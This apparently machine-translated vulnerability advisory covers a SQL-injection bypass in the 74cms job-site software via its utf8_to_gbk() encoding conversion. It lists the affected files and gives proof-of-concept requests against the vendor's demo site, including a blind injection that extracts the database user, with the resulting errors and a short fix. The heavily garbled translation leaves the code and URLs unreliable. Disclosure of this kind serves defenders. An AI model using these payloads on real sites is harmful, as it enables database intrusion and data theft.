74cms (20141020) Global SQL Injection filtering bypass
74cms_v3.5.20.20151120
Attackers can bypass global SQL Injection filtering.
The defined function utf8_to_gbk (). The Code is as follows:
function utf8_to_gbk($utfstr) {global $UC2GBTABLE;$okstr = '';if(empty($UC2GBTABLE)) {define('CODETABLEDIR', dirname(__FILE__).DIRECTORY_SEPARATOR.'encoding'.DIRECTORY_SEPARATOR);$filename = CODETABLEDIR.'gb-unicode.table';$fp = fopen($filename, 'rb');while($l = fgets($fp,15)) { $UC2GBTABLE[hexdec(substr($l, 7, 6))] = hexdec(substr($l, 0, 6));}fclose($fp);}$okstr = '';$ulen = strlen($utfstr);for($i=0; $i<$ulen; $i++) {$c = $utfstr[$i];$cb = decbin(ord($utfstr[$i]));if(strlen($cb)==8) { $csize = strpos(decbin(ord($cb)),'0');for($j = 0; $j < $csize; $j++) {$i++; $c .= $utfstr[$i];}$c = utf8_to_unicode($c);if(isset($UC2GBTABLE[$c])) {$c = dechex($UC2GBTABLE[$c]+0x8080);$okstr .= chr(hexdec($c[0].$c[1])).chr(hexdec($c[2].$c[3]));} else {$okstr .= '&#'.$c.';';}} else {$okstr .= $c;}}$okstr = trim($okstr);return $okstr;}
However, this conversion code will still cause SQL injection.
For example, if the input is % 88% ec % 27, it is changed
% 88% ec % 5c % 27,
After utf8_to_gbk () is converted, it is changed to: injection, resulting in 'injection.
Theoretically, all codes that use utf8_to_gbk () and then contain SQL statements are affected.
# Grep-nr utf8_to_gbk ../user/company/company_info.php: 26: $ setsqlarr ['companyname'] = trim ($ _ POST ['companyname'])? Utf8_to_gbk (trim ($ _ POST ['companyname']): exit ('????????????????? ');. /User/company/company_info.php: 29: $ setsqlarr ['nature _ cn'] = utf8_to_gbk (trim ($ _ POST ['nature _ cn']);. /user/company/company_info.php: 31: $ setsqlarr ['trade _ cn'] = utf8_to_gbk (trim ($ _ POST ['trade _ cn']);. /user/company/company_info.php: 34: $ setsqlarr ['District _ cn'] = utf8_to_gbk (trim ($ _ POST ['District _ cn']);. /user/company/company_info.php: 38: $ setsqlarr ['street _ cn'] = utf8_to_gbk (trim ($ _ POST ['street _ cn']);. /us Er/company/company_info.php: 40: $ setsqlarr ['Scale'] = trim ($ _ POST ['Scale'])? Utf8_to_gbk (trim ($ _ POST ['Scale']): exit ('????????????? ');. /User/company/company_info.php: 41: $ setsqlarr ['scale _ cn'] = utf8_to_gbk (trim ($ _ POST ['scale _ cn']);. /user/company/company_info.php: 42: $ setsqlarr ['registered'] = utf8_to_gbk (trim ($ _ POST ['registered']);. /user/company/company_info.php: 43: $ setsqlarr ['currency '] = utf8_to_gbk (trim ($ _ POST ['currency']);. /user/company/company_info.php: 44: $ setsqlarr ['address'] = trim ($ _ POST ['address'])? Utf8_to_gbk (trim ($ _ POST ['address']): exit ('???? Why ??????? ');./User/company/company_info.php: 46: $ setsqlarr ['Contact'] = trim ($ _ POST ['Contact '])? Utf8_to_gbk (trim ($ _ POST ['Contact ']): exit ('???? Why ?????? ');./User/company/company_info.php: 48: $ setsqlarr ['telphone'] = trim ($ _ POST ['telphone'])? Utf8_to_gbk (trim ($ _ POST ['telphone']): exit ('???? Parameters ???? ?? ');./User/company/company_info.php: 50: $ setsqlarr ['email'] = trim ($ _ POST ['email '])? Utf8_to_gbk (trim ($ _ POST ['email ']): exit ('???? Why ??????? ');. /User/company/company_info.php: 52: $ setsqlarr ['website'] = utf8_to_gbk (trim ($ _ POST ['website']);. /user/company/company_info.php: 54: $ setsqlarr ['contents'] = trim ($ _ POST ['contents'])? Utf8_to_gbk (trim ($ _ POST ['tents']): exit ('???? Why ?????? Comment ');. /user/user_report_resume.php: 189: $ setsqlarr ['content'] = utf8_to_gbk ($ setsqlarr ['content']);. /user/user_report_resume.php: 190: $ setsqlarr ['title'] = utf8_to_gbk ($ setsqlarr ['title']);. /user/user_apply_jobs.php: 302: $ addarr ['note'] = utf8_to_gbk ($ addarr ['note']);. /user/user_invited.php: 347: $ addarr ['note'] = utf8_to_gbk ($ addarr ['note']);. /user/personal/personal_resume.php: 244: $ setsqlarr ['title'] = trim ($ _ POST ['title'])? Utf8_to_gbk (trim ($ _ POST ['title']): "delta ???????? ";./User/personal/personal_resume.php: 246: $ setsqlarr ['fullname'] = trim ($ _ POST ['fullname'])? Utf8_to_gbk (trim ($ _ POST ['fullname']): exit ('???? Why ?????? ');. /User/personal/personal_resume.php: 250: $ setsqlarr ['sex _ cn'] = utf8_to_gbk (trim ($ _ POST ['sex _ cn']);. /user/personal/personal_resume.php: 252: $ setsqlarr ['residence '] = trim ($ _ POST ['residence'])? Utf8_to_gbk (trim ($ _ POST ['residence ']): exit ('???????????? ');. /User/personal/personal_resume.php: 253: $ setsqlarr ['residence _ cn'] = utf8_to_gbk (trim ($ _ POST ['residence _ cn']);. /user/personal/personal_resume.php: 255: $ setsqlarr ['education _ cn'] = utf8_to_gbk (trim ($ _ POST ['education _ cn']); /user/personal/personal_resume.php: 257: $ setsqlarr ['experience _ cn'] = utf8_to_gbk (trim ($ _ POST ['experience _ cn']); /user/personal/personal_resume.php: 258: $ setsqlarr ['email '] = trim ($ _ PO ST ['email '])? Utf8_to_gbk (trim ($ _ POST ['email ']): exit ('???? Parameters ???? ');. /User/personal/personal_resume.php: 263: $ setsqlarr ['householdaddress _ cn'] = utf8_to_gbk (trim ($ _ POST ['householdaddress _ cn']);. /user/personal/personal_resume.php: 265: $ setsqlarr ['marriage _ cn'] = utf8_to_gbk (trim ($ _ POST ['marriage _ cn']); /user/personal/personal_resume.php: 266: $ setsqlarr ['intention _ jobs'] = utf8_to_gbk (trim ($ _ POST ['intention _ job']); /user/personal/personal_resume.php: 268: $ setsqlarr ['tra De_cn '] = utf8_to_gbk (trim ($ _ POST ['trade _ cn']);. /user/personal/personal_resume.php: 271: $ setsqlarr ['District _ cn'] = utf8_to_gbk (trim ($ _ POST ['District _ cn']);. /user/personal/personal_resume.php: 273: $ setsqlarr ['nature _ cn'] = utf8_to_gbk (trim ($ _ POST ['nature _ cn']);. /user/personal/personal_resume.php: 275: $ setsqlarr ['wage _ cn'] = utf8_to_gbk (trim ($ _ POST ['wage _ cn']);. /user/personal/personal_resume.php: 394: $ scho Ol = utf8_to_gbk (trim ($ _ POST ['school ']);. /user/personal/personal_resume.php: 395: $ speciality = utf8_to_gbk (trim ($ _ POST ['speciality ']);. /user/personal/personal_resume.php: 396: $ education_cn = utf8_to_gbk (trim ($ _ POST ['education _ cn']);. /user/personal/personal_resume.php: 496: $ companyname = utf8_to_gbk (trim ($ _ POST ['companyname']);. /user/personal/personal_resume.php: 497: $ jobs = utf8_to_gbk (trim ($ _ POST ['Jobs']);. /user/personal/personal_resume.php: 498: $ achievements = utf8_to_gbk (trim ($ _ POST ['achievements']);. /user/personal/personal_resume.php: 601: $ agency = utf8_to_gbk (trim ($ _ POST ['Agency ']);. /user/personal/personal_resume.php: 602: $ course = utf8_to_gbk (trim ($ _ POST ['Course']);. /user/personal/personal_resume.php: 603: $ description = utf8_to_gbk (trim ($ _ POST ['description']);. /user/plus/ajax_user.p Hp: 32: $ username = utf8_to_gbk ($ username );. /user/plus/ajax_user.php: 33: $ password = utf8_to_gbk ($ password );. /user/plus/ajax_user.php: 41: $ postcaptcha = utf8_to_gbk ($ postcaptcha );. /user/plus/ajax_user.php: 73: $ postcaptcha = utf8_to_gbk ($ postcaptcha );. /user/plus/ajax_user.php: 87: $ username = utf8_to_gbk ($ username );. /user/plus/ajax_user.php: 88: $ password = utf8_to_gbk ($ password );. /user/ plus/ajax_user.php: 134: $ usname = u Tf8_to_gbk ($ usname );. /user/plus/ajax_user.php: 157: $ email = utf8_to_gbk ($ email );. /user/user_report.php: 189: $ setsqlarr ['content'] = utf8_to_gbk ($ setsqlarr ['content']);. /user/user_report.php: 190: $ setsqlarr ['jobs _ name'] = utf8_to_gbk ($ setsqlarr ['jobs _ name']);. /wap/company/wap_company_jobs.php: 83: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/company/wap_company_jobs.php: 324: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/company/wap_user.php: 49: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/personal/wap_apply.php: 46: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/personal/wap_user.php: 93: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/personal/wap_user.php: 231: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/personal/wap_user.php: 294: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/personal/wap_user.php: 335: $ _ POST = Rray_map ("utf8_to_gbk", $ _ POST );. /wap/personal/wap_user.php: 410: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/personal/wap_user.php: 481: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/personal/wap_user.php: 539: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /wap/personal/wap_user.php: 643: $ _ POST = array_map ("utf8_to_gbk", $ _ POST );. /include/common. fun. php: 934: function utf8_to_gbk ($ utfstr ){. /plus/ajax_search_locat Ion. php: 18: $ _ GET ['key'] = utf8_to_gbk ($ _ GET ['key']);. /plus/ajax_simple.php: 266: $ pwd = utf8_to_gbk ($ pwd );. /plus/weixin. php: 36: $ keyword = utf8_to_gbk ($ keyword );. /plus/ajax_common.php: 69: $ gbk_query = utf8_to_gbk ($ gbk_query );. /plus/ajax_street.php: 48: if (strcasecmp (QISHI_DBCHARSET, "utf8 ")! = 0) $ key = utf8_to_gbk ($ key );. /plus/ajax_user.php: 32: $ username = utf8_to_gbk ($ username );. /plus/ajax_user.php: 33: $ password = utf8_to_gbk ($ password );. /plus/ajax_user.php: 41: $ postcaptcha = utf8_to_gbk ($ postcaptcha );. /plus/ajax_user.php: 73: $ postcaptcha = utf8_to_gbk ($ postcaptcha );. /plus/ajax_user.php: 87: $ username = utf8_to_gbk ($ username );. /plus/ajax_user.php: 88: $ password = utf8_to_gbk ($ password );. /plus/ajax_user.php: 134: $ usname = utf8_to_gbk ($ usname );. /plus/ajax_user.php: 157: $ email = utf8_to_gbk ($ email );
Here we will not try one by one, but use one or two of them for verification:
1:
Http://demo.74cms.com/plus/ajax_common.php? Act = hotword & query = % 88% ec % 27
SQL error returned:
Error: Query error: SELECT * FROM qs_hotword WHERE w_word like '% comment' % 'order BY 'w _ hot' desc limit 0, 10
AND/OR injection bypasses the dongle to get the user () Information:
If it is FALSE, all hotwords are returned:
Http://demo.74cms.com/plus/ajax_common.php? Act = hotword & query = % 88% ec % 27% 20or % 20 strcmp (substr (user (), 114,111,111,116), char (64,108,111, 108,104,111,115,115,) % 23
TRUE: no results are returned.
Http://demo.74cms.com/plus/ajax_common.php? Act = hotword & query = % 88% ec % 27% 20or % 20 strcmp (substr (user (), 114,111,111,116), char (64,108,111, 108,104,111,115,116,) % 23
User () = root @ localhost
2:
Http://demo.74cms.com/plus/ajax_user.php? Act = check_usname
POST: usname=%88%ec%27
Returned error:
Error: Query error: select * from qs_members where username = '& #35612; ''LIMIT 1
Solution:
Correct utf8_to_gbk () and do not rely heavily on global filtering.